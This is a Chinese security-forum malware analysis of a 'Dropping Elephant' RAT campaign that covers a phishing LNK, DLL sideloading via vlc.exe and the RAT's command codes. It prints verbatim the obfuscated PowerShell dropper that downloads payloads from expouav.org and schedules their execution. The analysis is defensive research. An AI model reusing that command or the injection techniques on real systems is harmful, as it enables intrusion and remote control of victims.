-
-
[原创][分享]dropping-elephant rat恶意样本分析
-
发表于: 2025-8-6 16:28
-
威胁行为者通过发送带有恶意lnk文件的钓鱼邮件来发起攻击。lnk文件伪装为pdf文件诱导受害者点击,当受害者点击后会通过Pester.bat执行恶意的power shell命令。
命令如下
powershell 脚本通过在expouav.org下载多个文件。
具体下载的文件信息如下
1、欺骗显示的pdf正常文件Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf
2、合法的播放器文件vlc.exe
3、恶意的dll库libvlc.dll
4、合法的Microsoft任务计划程序Winver.exe
5、加密的shellcode文件vlc.log
通过下载的Winver 文件创建计划任务执行vlc文件。然后通过合法的vlc.exe加载恶意的libvlc.dll库,解密执行shellcode。
由于未下载到shellcode文件,以下对shellcode释放的最终负载RAT做分析。
隐藏窗口
唯一实例
创建互斥体ghjghkj
获取用户信息发送注册包
部分信息如下
用户名
计算机名
本地IP与出口IP地址
创建线程通过HTTP发送注册包
数据发送前经过base64编码与aes加密
base64
aes
命令执行循环
发送cuud 包获取命令
命令3Up3:上传文件,可执行
命令3gjdfghj6:执行CMD命令
命令3ngjfng5:下载文件
命令3CRT3:远程线程注入执行
命令3APC3:APC注入执行
命令3SC3:屏幕监控
2f6K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6S2M7X3y4@1K9h3y4%4L8$3I4X3i4K6u0W2j5$3!0E0i4K6u0r3M7X3g2K6L8%4g2J5j5$3g2K6i4K6u0r3j5X3I4G2k6#2)9J5c8X3c8J5L8%4m8H3K9h3&6Y4i4K6u0V1k6h3I4W2M7r3S2S2L8Y4c8Q4x3X3c8S2M7s2c8Q4x3X3c8Y4M7X3!0#2M7q4)9J5k6s2c8S2M7X3N6W2N6s2y4Q4x3X3c8@1N6i4u0C8K9i4y4Z5i4K6u0V1k6r3g2X3k6h3&6K6k6g2)9J5k6r3W2F1k6s2g2K6N6s2u0&6i4K6u0r3
"C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat" ;powershell s''l''eep 1;$ProgressPreference = 'SilentlyContinue';$a='https:';$b='C:\Users\';$c='C:\Windows\';wg''et $a//expouav.org/download/fetch/list3/12717/view/0d5a0411-0a85-42cf-928c-dd9218019f3b -OutFile $b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf;s''ap''s "$b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf";wg''et $a//expouav.org/download/fetch/list7/40275/view/e49c7ae0-f3d1-4073-83bb-b4ecba929fec -Outfile $c\Tasks\lama;r''e''n -Path "$c\Tasks\lama" -NewName "$c\Tasks\vlc.pepxpe";r''e''n -Path "$c\Tasks\vlc.pepxpe" -NewName ((Split-Path "$c\Tasks\vlc.pepxpe" -Leaf) -replace "p", "");wg''et $a//expouav.org/download/fetch/list5/19577/view/b5aaa6f0-6259-4ccb-b31a-d21e40c2eeff -Outfile $c\Tasks\lake;r''e''n -Path "$c\Tasks\lake" -NewName "$c\Tasks\libvlc.pdplpl";r''e''n -Path "$c\Tasks\libvlc.pdplpl" -NewName ((Split-Path "$c\Tasks\libvlc.pdplpl" -Leaf) -replace "p", "");wg''et $a//expouav.org/download/fetch/list6/41568/view/701bbff4-8fcb-4e9c-8577-00aed06d8443 -Outfile $c\Tasks\dalai;r''e''n -Path "$c\Tasks\dalai" -NewName "$c\Tasks\Winver.pepxpe";r''e''n -Path "$c\Tasks\Winver.pepxpe" -NewName ((Split-Path "$c\Tasks\Winver.pepxpe" -Leaf) -replace "p", "");c''p''i "$b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf" -destination .;wg''et $a//expouav.org/download/fetch/list8/20041/view/c6795195-6e84-4720-9420-e03da09b2187 -OutFile $c\Tasks\vlc.log;$d="$c\Tasks\Winver";s''ap''s $d -a "/Create", '/sc', 'minute', '/tn', 'NewErrorReport', '/tr', "$c\Tasks\vlc", '/f';e''r''a''s''e *d?.?n?"C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat" ;powershell s''l''eep 1;$ProgressPreference = 'SilentlyContinue';$a='https:';$b='C:\Users\';$c='C:\Windows\';wg''et $a//expouav.org/download/fetch/list3/12717/view/0d5a0411-0a85-42cf-928c-dd9218019f3b -OutFile $b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf;s''ap''s "$b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf";[培训]Windows内核深度攻防:从Hook技术到Rootkit实战!
|
|
|---|---|
